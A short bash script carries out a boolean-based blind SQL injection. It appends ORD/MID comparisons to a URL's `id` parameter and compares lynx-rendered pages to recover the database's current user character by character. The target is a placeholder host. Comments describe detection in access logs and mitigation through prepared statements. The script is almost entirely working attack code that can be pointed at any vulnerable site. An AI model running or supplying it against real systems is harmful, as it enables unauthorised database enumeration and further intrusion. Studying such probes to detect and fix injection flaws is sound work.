#!/bin/bash
# Very simple blind SQL injection test that displays the database user it recovers.
# Ugly: there is no character count, so a fixed number of positions is always probed.
# http://kaneda.bohater.net
# idea from sqlmap

# Boolean-based blind SQL injection probe against the `id` query parameter.
#
# How it works, as written:
#   1. Fetch the page for id=0 once and keep lynx's rendered text as a baseline.
#   2. For each position Y in 1..10, append an
#      `AND ORD(MID((current_user()), Y, YY)) > N` condition to the same
#      parameter for N in 97..122 (ASCII 'a'..'z'), with YY = Y + 1 passed as
#      MID's third argument.
#   3. The first N whose rendered page differs from the baseline is printed as
#      a character, and the script moves on to the next position.
#
# Defender notes:
#   - Detection: one run issues up to 261 sequential GETs (1 baseline plus
#     10 x 26 probes) to a single path, each carrying AND / ORD / MID /
#     current_user() in the `id` value. Nothing here overrides the client
#     identity, so the requests arrive with lynx's default User-Agent. Both
#     the keyword pattern and the request burst show up in access logs.
#   - Mitigation: bind `id` as a typed parameter (prepared statement) so that
#     appended text is never parsed as SQL, and reject non-numeric ids before
#     they reach the query.
#
# The host below is presumably the author's placeholder; confirm before reuse.

# Reference response that every probe is compared against.
baseline=$(lynx --dump "http://bug.com/site?id=0")

for ((Y = 1; Y <= 10; Y++)); do
  # Computed once per position; the value is the same for every N.
  YY=$((Y + 1))

  for ((N = 97; N <= 122; N++)); do
    probe=$(lynx --dump "http://bug.com/site?id=0 AND ORD(MID((current_user()), $Y, $YY)) > $N")

    # Same rendered text as the baseline: try the next candidate code.
    if [ "$baseline" = "$probe" ]; then
      continue
    fi

    # First differing response for this position: emit the character whose
    # code is N, then stop sending requests for this position.
    printf '%s' "$(perl -e "print pack(\"C\",$N)")"
    break
  done
done

# Terminate the line of recovered characters.
echo

